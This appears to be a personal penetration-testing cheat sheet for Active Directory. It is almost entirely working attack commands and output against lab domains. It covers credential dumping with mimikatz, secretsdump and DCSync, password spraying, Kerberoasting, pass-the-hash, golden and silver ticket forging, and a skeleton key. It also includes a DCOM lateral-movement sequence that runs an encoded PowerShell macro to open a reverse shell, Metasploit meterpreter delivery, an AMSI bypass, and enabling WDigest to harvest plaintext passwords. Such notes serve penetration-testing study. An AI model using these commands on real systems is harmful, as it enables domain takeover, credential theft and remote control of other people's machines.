ActiveDirectory
Active Directory 
Enumeration
net user /domain
net user adminjeff /domain
net group /domain
net accounts
net use # mapped drives
net share # shares exposed by this host
klist # tickets
whoami /groups
setspn -T corp.com -Q */* # service accounts
# List domain computers whose operatingSystem attribute starts with "Windows 10",
# querying the PDC emulator over LDAP with the explicit credentials given below.
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
# Domain DN derived from the DNS name (corp.com -> DC=corp,DC=com).
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString = "LDAP://$PDC/$DistinguishedName"
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
# NOTE(review): credentials are embedded in plain text (lab values as written in the notes).
$objDomain = New-Object System.DirectoryServices.DirectoryEntry($SearchString, "corp.com\offsec", "lab")
$Searcher.SearchRoot = $objDomain
$Searcher.filter = "operatingSystem=Windows 10*"
$Searcher.FindAll()
# Print every group that has at least one member, followed by its member DNs.
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
# Domain DN derived from the DNS name (corp.com -> DC=corp,DC=com).
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString = "LDAP://$PDC/$DistinguishedName"
# Echo the LDAP path being queried.
$SearchString
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
# NOTE(review): credentials are embedded in plain text (lab values as written in the notes).
$objDomain = New-Object System.DirectoryServices.DirectoryEntry($SearchString, "corp.com\offsec", "lab")
$Searcher.SearchRoot = $objDomain
$Searcher.filter = "(&(objectClass=Group)(member=*))"
$groups = $Searcher.FindAll()
$groups | ForEach-Object {
    $_.Properties.name
    $_.Properties.member
    Write-Host "`n"
}
# Dump every property of each object whose servicePrincipalName contains "http".
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
# Domain DN derived from the DNS name (corp.com -> DC=corp,DC=com).
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString = "LDAP://$PDC/$DistinguishedName"
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
# NOTE(review): credentials are embedded in plain text (lab values as written in the notes).
$objDomain = New-Object System.DirectoryServices.DirectoryEntry($SearchString, "corp.com\offsec", "lab")
$Searcher.SearchRoot = $objDomain
$Searcher.filter = "serviceprincipalname=*http*"
$Result = $Searcher.FindAll()
$Result | ForEach-Object {
    foreach ($prop in $_.Properties) {
        $prop
    }
}
LDAPsearch
nmap -n -sV --script "ldap* and not brute" 192.168.164.122
ldapsearch -LLL -x -H ldap://pathfinder.htb -b '' -s base '(objectClass=*)'
ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.164.122" "(objectclass=*)"
powershell -ep bypass
. .\PowerView.ps1
Get-Domain
Get-DomainSID
Get-DomainPolicy
Get-DomainController
(Get-DomainPolicy)."SystemAccess"
(Get-DomainPolicy)."kerberospolicy"
Get-DomainUser
Get-DomainUser | select cn
Get-DomainUser -Identity Jeff_Admin
Get-NetLoggedon -ComputerName machine0001
Get-NetSession -ComputerName dc01
Get-LastLoggedOn -ComputerName client251.corp.com
Get-NetComputer| select name
Get-NetComputer -OperatingSystem "*Server 2016*" | select name ,operatingsystem |Format-List
Get-NetComputer | select samaccountname, operatingsystem
Get-NetGroup | select name
Get-NetGroup 'Domain Admins'
Get-NetGroup "*admin*"| select name
Get-NetGroup -UserName <USER>
Get-NetGroupMember "Domain Admins"
Invoke-ShareFinder -Verbose
Get-NetShare
Find-DomainShare
Find-DomainShare -CheckShareAccess
Get-NetGPO
Get-NetGPO| select displayname
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
Get-NetGPO -ComputerName <ComputerName> | select displayname
Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh
Get-NetDomainTrust
Get-NetDomainTrust -Domain <domain>
Get-DomainTrustMapping
Get-NetForest
Get-NetForest -Forest <forest>
Get-NetForestDomain
Get-NetForestDomain -Forest karim.net
Get-NetForestCatalog
Get-NetForestCatalog -Forest <forest>
Credentials
SAM
#windows
reg save HKLM\sam C:\sam
reg save HKLM\system C:\system
#kali
impacket-secretsdump -system system -sam sam local
samdump2 system sam
privilege::debug
token::elevate
lsadump::sam
lsadump::lsa /patch
#Cache
sekurlsa::logonpasswords
sekurlsa::tickets
Import-Module .\Invoke-PowerDump.ps1
Invoke-PowerDump
crackmapexec smb 192.168.224.0/24 -u Administrator -p lab --sam
john hash.txt -w=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt --format=NT
NTDS.dit
crackmapexec smb 192.168.0.200 -u Administrator -p Adminpassw0rd --ntds drsuapi
impacket-secretsdump spookysec.local/backup:backup2517860@10.10.92.76
#DomainController
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
#Kali
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Spraying
Spray-Passwords.ps1 -Pass Qwerty09! -Admin
Spray-Passwords.ps1 -File .\words.txt -Admins
crackmapexec smb 192.168.224.0/24 -u users.txt -p Summer18
crackmapexec smb 192.168.224.0/24 -u Administrator -p lab
Attack
Kerberoast
1. Locate Service Account
setspn -T corp.com -Q */*
2. Request ticket(s). A single ticket:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/CorpWebServer.corp.com"
#Request All Tickets
Add-Type -AssemblyName System.IdentityModel
setspn.exe -T corp.com -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
3. Extract
mimikatz # kerberos::list /export
4. Convert for john
kirbi2john.py * > hash
5. Crack
john --format=krb5tgs --wordlist=words.txt hash
Get-NetUser -SPN
Get-NetUser -SPN | select userprincipalname
Invoke-Kerberoast
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
Request-SPNTicket MSSQLSvc/CorpSqlServer.corp.com:1433
impacket-GetUserSPNs controller.local/Machine1:Password1 -dc-ip 10.10.154.51 -request -outputfile hash
# For each user account that carries a servicePrincipalName, print its name,
# distinguished name and every registered SPN (search root: current domain).
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$results = $search.Findall()
$results | ForEach-Object {
    $entry = $_.GetDirectoryEntry()
    Write-host "User : " $entry.name "(" $entry.distinguishedName ")"
    Write-host "SPNs"
    $entry.servicePrincipalName | ForEach-Object { $_ }
    Write-host ""
}
Rubeus.exe kerberoast
Rubeus.exe kerberoast /outfile:hashes.txt
ASReproasting
impacket-GetNPUsers spookysec.local/ -no-pass -usersfile validusers.txt -format hashcat -outputfile resultasreproast.txt
john -w=passwordlist.txt resultasreproast.txt
Rubeus.exe asreproast
Lateral Movement
Pass The Hash
crackmapexec smb 192.168.224.10 -u Administrator -H '2892d26cdf84d7a70e2eb3b9f05c425e' -x ipconfig
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.224.10 cmd
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e Administrator@192.168.224.10
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e corp.com/Administrator@192.168.224.10
evil-winrm -i 10.11.1.128 -u Administrator -H '6ff0e850285bca4d438247a627b28201'
wmiexec.py dj/Administrator@10.11.1.128 -hashes 'aad3b435b51404eeaad3b435b51404ee:6ff0e850285bca4d438247a627b28201'
#enable RDP
crackmapexec smb 127.0.0.1 -u alice -H 'b74242f37e47371aff835a6ebcac4ffe' -x 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
crackmapexec smb 127.0.0.1 -u alice -H 'b74242f37e' -M rdp -o action=enable
1. First, enable Restricted Admin Mode on the target
crackmapexec smb 10.11.1.24 -u Administrator -H 'ee0c207898a5bccc01f38115019ca2fb' --local-auth -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'
2. Connect with xfreerdp
xfreerdp /cert-ignore /compression /auto-reconnect /dynamic-resolution /v:10.11.1.24 /u:Administrator /pth:ee0c207898a5bccc01f38115019ca2fb
Overpass The Hash
c:\>runas "/user:corp.com\jeff_admin" "c:\Windows\notepad.exe"
Enter the password for corp.com\jeff_admin: lab
Attempting to start c:\Windows\notepad.exe as user "corp.com\jeff_admin" ...
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 1314193 (00000000:00140d91)
Session : Interactive from 0
User Name : jeff_admin
Domain : corp
Logon Server : DC01
Logon Time : 4/22/2022 5:28:20 PM
SID : S-1-5-21-4038953314-3014849035-1274281563-1104
msv :
[00000003] Primary
* Username : jeff_admin
* Domain : corp
* NTLM : 2892d26cdf84d7a70e2eb3b9f05c425e
* SHA1 : a188967ac5edb88eca3301f93f756ca8e94013a3
* DPAPI : d9f056fbcdea51fa473f063395fd3559
mimikatz # sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:2892d26cdf84d7a70e2eb3b9f05c425e /run:PowerShell.exe
user : jeff_admin
domain : corp.com
program : PowerShell.exe
impers. : no
NTLM : 2892d26cdf84d7a70e2eb3b9f05c425e
| PID 4640
| TID 5284
| LSA Process is now R/W
| LUID 0 ; 1374776 (00000000:0014fa38)
\_ msv1_0 - data copy @ 02CD9224 : OK !
\_ kerberos - data copy @ 02CD9048
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace -> null
PS C:\Windows\system32> net use \\dc01
The command completed successfully.
PS C:\Windows\system32> klist
Current LogonId is 0:0x14fa38
Cached Tickets: (3)
#2> Client: jeff_admin @ CORP.COM
Server: cifs/dc01 @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 4/22/2022 17:32:33 (local)
End Time: 4/23/2022 3:32:33 (local)
Renew Time: 4/29/2022 17:32:33 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DC01.corp.com
PS C:\Windows\system32> C:\Tools\active_directory\PsExec.exe \\dc01 cmd.exe
C:\Windows\system32>whoami
corp\jeff_admin
Pass the ticket
privilege::debug
sekurlsa::tickets /export
#locate the Administrator@krbtgt ticket (the TGT exported above)
kerberos::ptt 0-40e10000-Administrator@krbtgt~CONTROLLER.LOCAL-CONTROLLER.LOCAL.kirbi
klist
dir \\MACHINE\admin$
PsExec.exe \\MACHINE cmd.exe
Silver Ticket
c:\Users\offsec\Desktop>whoami /user
USER INFORMATION
----------------
User Name SID
=========== ==============================================
corp\offsec S-1-5-21-4038953314-3014849035-1274281563-1103
# NT hash of `Qwerty09!` computed with Rubeus (reused as the service key below)
C:\Users\lorka\Desktop>Rubeus.exe hash /password:Qwerty09!
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.6.4
[*] Action: Calculate Password Hash(es)
[*] Input password : Qwerty09!
[*] rc4_hmac : E2B475C11DA2A0748290D87AA966C327
[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
mimikatz # kerberos::list
mimikatz # kerberos::golden /user:offsec /domain:corp.com /sid:S-1-5-21-4038953314-3014849035-1274281563-1103 /target:CorpWebServer.corp.com /service:HTTP /rc4:E2B475C11DA2A0748290D87AA966C327 /ptt
User : offsec
Domain : corp.com (CORP)
SID : S-1-5-21-4038953314-3014849035-1274281563-1103
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: e2b475c11da2a0748290d87aa966c327 - rc4_hmac_nt
Service : HTTP
Target : CorpWebServer.corp.com
Lifetime : 4/24/2022 9:02:18 AM ; 4/21/2032 9:02:18 AM ; 4/21/2032 9:02:18 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'offsec @ corp.com' successfully submitted for current session
Golden Ticket
C:\Users\jeff_admin>whoami /user
USER INFORMATION
----------------
User Name SID
=============== ==============================================
corp\jeff_admin S-1-5-21-4038953314-3014849035-1274281563-1104
For mimikatz, the domain SID (the user SID above without its final RID) is: S-1-5-21-4038953314-3014849035-1274281563
mimikatz # lsadump::lsa /patch /name:krbtgt
Domain : corp / S-1-5-21-4038953314-3014849035-1274281563
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : fc274a94b36874d2560a7bd332604fab
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
mimikatz # kerberos::list
mimikatz # kerberos::golden /user:hackeruser /domain:corp.com /sid:S-1-5-21-4038953314-3014849035-1274281563 /krbtgt:fc274a94b36874d2560a7bd332604fab /ptt
User : hackeruser
Domain : corp.com (CORP)
SID : S-1-5-21-4038953314-3014849035-1274281563
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: fc274a94b36874d2560a7bd332604fab - rc4_hmac_nt
Lifetime : 4/24/2022 1:55:27 PM ; 4/21/2032 1:55:27 PM ; 4/21/2032 1:55:27 PM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'hackeruser @ corp.com' successfully submitted for current session
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00063A24
C:\Users\jeff_admin>c:\Tools\active_directory\PsExec.exe \\dc01 cmd.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
corp\hackeruser
C:\Windows\system32>hostname
DC01
Distributed Component Object Model (DCOM)
msfvenom -p windows/shell_reverse_tcp LHOST=172.16.224.10 LPORT=4444 -f hta-psh -o evil.hta
[lorka@kali officemacro]# python2.7 split.py
Str = Str + "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
Str = Str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewA"
Str = Str + "kAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnA"
...SNIP...
Sub revshell()
Dim Str As String
Str = Str + "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
Str = Str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewA"
...SNIP...
Shell (Str)
End Sub
C:\Users\jeff_admin>c:\Tools\practical_tools\nc.exe -lnvp 4444
listening on [any] 4444 ...
# Lateral movement over DCOM: drive a remote Excel.Application instance on
# 172.16.224.5 so that it opens the macro workbook copied below and runs its
# "revshell" macro (the VBA Sub shown earlier on this page).
# Remote activation of the Excel.Application COM class on 172.16.224.5 via DCOM.
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "172.16.224.5"))
$LocalPath = "C:\Users\jeff_admin\Desktop\revshell.xlsm"
# Destination is the remote C$ administrative share.
$RemotePath = "\\172.16.224.5\c$\revshell.xlsm"
# Third argument $True: overwrite an existing file of the same name.
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
# NOTE(review): presumably created because Excel started through DCOM runs under the
# system profile and expects this Desktop folder to exist — confirm before relying on it.
$Path = "\\172.16.224.5\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
# Path as seen from the remote host (the file copied into c$ above).
$Workbook = $com.Workbooks.Open("C:\revshell.xlsm")
# Runs the "revshell" macro, whose Shell(Str) call starts powershell.exe from Excel;
# an Office process spawning powershell.exe is the observable to alert on.
$com.Run("revshell")
Microsoft Windows [Version 10.0.16299.15]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\jeff_admin>c:\Tools\practical_tools\nc.exe -lnvp 4444
listening on [any] 4444 ...
connect to [172.16.224.10] from (UNKNOWN) [172.16.224.5] 50018
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Domain Controller Synchronization
mimikatz # lsadump::dcsync /user:Administrator
Tools
Enum4linux
enum4linux -a 10.10.148.241 # ALL
enum4linux -U 10.10.148.241 # Users
enum4linux -u administrator -p password -U 10.10.148.241 # With Creds
enum4linux -o 10.10.148.241 # OSinfo
CrackMapExec
Enumeration
crackmapexec smb ms.evilcorp.org
crackmapexec smb 192.168.1.0 192.168.0.2
crackmapexec smb 192.168.1.0-28 10.0.0.1-67
crackmapexec smb 192.168.1.0/24
crackmapexec smb targets.txt
#Domain
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --users
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --rid-brute
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --groups
#Local
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --local-users
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --local-group
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --loggedon-users
# Generate a list of relayable hosts (SMB Signing disabled)
crackmapexec smb 192.168.1.0/24 --gen-relay-list output.txt
# Enumerate available shares
crackmapexec smb 192.168.215.138 -u 'user' -p 'PASSWORD' --local-auth --shares
# Get the active sessions
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --sessions
# Check logged in users
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --lusers
# Get the password policy
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --pass-pol
crackmapexec smb 192.168.10.1 -u "" -p ""
crackmapexec smb 10.10.10.161 -u '' -p ''
crackmapexec smb 10.10.10.161 --pass-pol
crackmapexec smb 10.10.10.161 --users
crackmapexec smb 10.10.10.161 --groups
#anonymous
crackmapexec smb 10.10.10.178 -u 'a' -p ''
crackmapexec smb 192.168.10.1 -u 'user' -p 'PASSWORD' --shares
crackmapexec smb 192.168.10.1 -u 'user' -p 'PASSWORD' --disks
Authentication
crackmapexec smb 192.168.215.138 -u 'User' -p 'Pass'
crackmapexec smb 172.16.157.0/24 -u administrator -H 'NTHASH'
crackmapexec smb 192.168.215.138 -u 'Administrator' -p 'PASSWORD' --local-auth
crackmapexec smb 172.16.157.0/24 -u administrator -H 'NTHASH' --local-auth
crackmapexec smb 192.168.100.0/24 -u "admin" -p "password1"
crackmapexec smb 192.168.100.0/24 -u "admin" -p "password1" "password2"
crackmapexec smb 192.168.100.0/24 -u "admin1" "admin2" -p "P@ssword"
crackmapexec smb 192.168.100.0/24 -u user_file.txt -p pass_file.txt
crackmapexec smb 192.168.100.0/24 -u user_file.txt -H ntlm_hashFile.txt
Execution
# CrackMapExec has 3 different command execution methods (in default order) :
# - wmiexec --> WMI
# - atexec --> scheduled task
# - smbexec --> creating and running a service
# Execute command through cmd.exe (admin privileges required)
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x 'whoami'
# Force the smbexec method
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec
# Execute commands through PowerShell (admin privileges required)
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X 'whoami'
# Bypass AMSI
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --amsi-bypass /path/payload
# Meterpreter
* On MSF instance
use exploit/multi/script/web_delivery
set SRVHOST 192.168.119.205 #kali host
set SRVPORT 8443
set target 5 #SyncAppvPublishingServer
set payload windows/meterpreter/reverse_https
set LHOST 192.168.119.205
set LPORT 443
run -j
* copy the random URI segment that web_delivery prints (e.g. eYEssEwv2D from http://10.211.55.4:8080/eYEssEwv2D)
* With CME
crackmapexec 192.168.10.0/24 -u username -p password -M met_inject -o SRVHOST=192.168.119.205 SRVPORT=8443 RAND=eYEssEwv2D SSL=http
Files
crackmapexec smb 10.11.1.24 -u Administrator -H 'ee0c207898a5bccc01f38115019ca2fb' --local-auth --get-file \\Users\\Administrator\\Desktop\\proof.txt proof.txt
crackmapexec smb 10.11.1.24 -u Administrator -H 'ee0c207898a5bccc01f38115019ca2fb' --local-auth --put-file test.txt \\Users\\Administrator\\Desktop\\test.txt
Credentials
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --sam
# Enable WDigest to get credentials from the LSA Memory
crackmapexec smb 10.11.1.123 -u Administrator -H '3fee04b01f59a1001a366a7681e95699' --local-auth -M wdigest -o ACTION=enable
# Then wait for the user to log off and log on again,
# or force the logoff:
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'quser'
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'logoff <sessionid>'
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --lsa
crackmapexec smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
crackmapexec smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -M lsassy
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -M nanodump
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -M mimikatz
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"'
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -M wireless
MSSQL
crackmapexec mssql 10.11.1.31 -u sa -p poiuytrewq --local-auth
crackmapexec mssql 10.11.1.31 -u sa -p poiuytrewq --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
crackmapexec mssql 10.11.1.31 -u sa -p poiuytrewq --local-auth -x "whoami"
LDAP
crackmapexec ldap hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -M laps
crackmapexec ldap hutch.offsec -u Administrator -p 'V2%.#lQ+t72%Rx' -M user-desc
Kerbrute
user enumeration
kerbrute userenum --dc 10.11.1.20 -d svcorp.com users.txt
kerbrute bruteuser --dc 10.10.148.241 -d spookysec.local passwordlist.txt svc-admin
kerbrute passwordspray --dc 10.10.148.241 -d spookysec.local validusers.txt management2005
Mimikatz
#general
privilege::debug
log
log customlogfilename.log
#sekurlsa
sekurlsa::logonpasswords
sekurlsa::logonPasswords full
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
#kerberos
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
#crypto
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
#vault & lsadump
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::lsa /patch
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
#pth
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
#ekeys
sekurlsa::ekeys
#dpapi
sekurlsa::dpapi
#minidump
sekurlsa::minidump lsass.dmp
#ptt
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi
#golden/silver
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
#tgt
kerberos::tgt
#purge
kerberos::purge
# skeleton
misc::skeleton
Rubeus
harvest TGTs
Rubeus.exe harvest /interval:30
Spraying
Rubeus.exe brute /password:Password1 /noticket
BloodHound
SharpHound.exe -c ALL --zipfilename blood.zip
bloodhound-python -u 'alice@svcorp.com' -p 'ThisIsTheUsersPassword01' -ns 10.11.1.20 -d svcorp.com -dc SV-DC01.svcorp.com -c all --zip
MATCH p=(u {owned: true})-[r1]->(n) WHERE r1.isacl=true RETURN p
MATCH p=shortestPath((c {owned: true})-[*1..3]->(s)) WHERE NOT c = s RETURN p
Responder
Capture NTLM
responder -I tun0 --lm -v
LAPSdumper
#Link
https://github.com/n00py/LAPSDumper
#Use
python3 laps.py -u fmcsorley -p CrabSharkJellyfish192 -d HUTCH.OFFSEC